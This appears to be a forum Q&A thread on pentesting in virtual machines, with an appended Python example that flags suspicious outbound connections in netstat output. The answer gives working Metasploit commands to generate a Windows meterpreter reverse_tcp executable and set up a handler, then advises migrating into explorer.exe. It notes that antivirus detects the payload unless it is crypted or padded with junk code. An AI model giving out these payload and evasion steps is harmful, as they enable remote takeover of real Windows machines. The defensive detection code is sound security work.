Can I set metasploit reverse TCP connection while doing pentesting in the VMs?
msfconsole is a cool open-source pentesting tool from Metasploit.
Once the exploit is valid, we can set payload to the victim. For persistent connection, we may need meterpreter. But we often test security in Virtual Machines running msfconsole. Without public IP, can the victim PC bind back to our local server in VMs?
Knowing you're using Metasploit reverse TCP is a good sign, just pointing that out.
First, you need to create a payload by doing the following:
msfpayload windows/meterpreter/reverse_tcp LHOST="your local IP without quotations" LPORT="any specified port you operate on" X > filenamehere.exe
Next, follow these steps in order by number when typing into the terminal:
1. msfconsole
2. use exploit/multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST "ip you used when creating the payload in the first step without quotations"
5. set LPORT "port you used when creating the payload in the first step without quotations"
6. exploit
After you type exploit, and if followed correctly, you will get a message in the terminal like this:
[*] Started reverse handler on "IP Address"
[*] Starting the payload handler...
Now, with the payload you created in the first step, you want to run it on the machine you're classing as the "victim". Of course, this won't work if you have antivirus because it (the payload) hasn't been crypted by a crypter or coded with junk code to hide the payload. Once you run the payload on the victim computer, you'll get a meterpreter session within your terminal. When you're in the meterpreter session, the first thing you need to do is migrate to explorer.exe and you can do this by typing the following into your terminal:
ps (shows the current running processes on the computer with a number ID on the left of it)
migrate (id of explorer.exe)
Have fun with your meterpreter session.

Without public IP, can the victim PC bind back to our local server in VMs?
This is possible, but that depends. If your VM machine IP is local on your computer, usually it will assign itself to a 198 IP. That's what always happens with me anyway, so that is rendered useless to the 'victim' since it is a local IP. If you don't encrypt your TCP connection via VPN as such and the victim has the correct knowledge let's say, he can view his connection logs, see his ingoing and outgoing connections, and your connections aren't encrypted and your public IP is in plain view, he may be able to DOX or achieve information with whatever method he/she knows.
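Two points in the answer above can be checked from the defender's side: an LHOST on a private range cannot be reached by a host outside the lab, and a reverse TCP session shows up in the victim's own connection table as an established outbound connection from one process. The Python below is an added example, not code from the question, the answer or Metasploit: it classifies an address the way the answer describes and flags established outbound connections to unexpected remote ports in a constructed netstat -ano sample (the sample lines, the port allow-list and the handler port 4444 are assumptions).

```python
import ipaddress
import re

# Constructed sample of Windows `netstat -ano` output (not taken from the page);
# the first row is what a session to a lab handler on port 4444 would look like.
SAMPLE_NETSTAT = """\
  TCP    192.168.56.101:49712   192.168.56.1:4444      ESTABLISHED     3120
  TCP    192.168.56.101:49715   8.8.8.8:443            ESTABLISHED     1880
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
"""

NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")

# Remote ports an ordinary workstation is expected to talk to (assumed allow-list).
EXPECTED_REMOTE_PORTS = {80, 443}


def address_scope(ip: str) -> str:
    """'private' covers RFC 1918, loopback and link-local: an LHOST in that scope
    is one that a victim outside the lab network could never route back to."""
    addr = ipaddress.ip_address(ip)
    if addr.is_loopback or addr.is_link_local or addr.is_private:
        return "private"
    return "public"


def parse_netstat(text: str) -> list:
    """Turn netstat -ano rows into dicts; non-TCP and malformed rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        laddr, lport, raddr, rport, state, pid = m.groups()
        rows.append({"local": laddr, "remote": raddr, "rport": int(rport),
                     "state": state, "pid": int(pid)})
    return rows


def suspicious_outbound(text: str) -> list:
    """Established connections to an unexpected remote port, tagged with the scope
    of the remote end so an analyst can tell a lab VM from an Internet host."""
    hits = []
    for row in parse_netstat(text):
        if row["state"] != "ESTABLISHED" or row["rport"] in EXPECTED_REMOTE_PORTS:
            continue
        hits.append({**row, "remote_scope": address_scope(row["remote"])})
    return hits
```

On the sample, only the connection from PID 3120 to 192.168.56.1:4444 is returned, and its remote end is classified as private, which is exactly the case the answer says cannot work against a victim outside your own network.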